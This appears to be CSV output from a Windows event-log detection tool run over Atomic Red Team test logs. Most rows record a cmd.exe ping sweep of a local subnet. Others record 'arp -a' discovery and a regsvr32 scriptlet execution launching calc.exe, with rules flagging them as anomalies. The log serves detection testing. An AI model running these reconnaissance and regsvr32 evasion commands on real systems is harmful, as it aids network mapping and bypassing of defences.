2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.209  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.210  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.211  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.212  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.213  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.214  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.215  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.216  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.217  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.218  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.219  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.220  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.221  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.222  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.223  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.224  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.225  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.226  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.227  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.228  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.229  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.230  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.231  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.232  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.233  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.234  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.235  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.236  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.237  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.238  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.239  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.240  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.241  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.242  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.243  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.244  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.245  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.246  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.247  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.248  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.249  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.250  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.251  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.252  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.253  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.254  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp  -a  :  Path: C:\Windows\System32\ARP.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
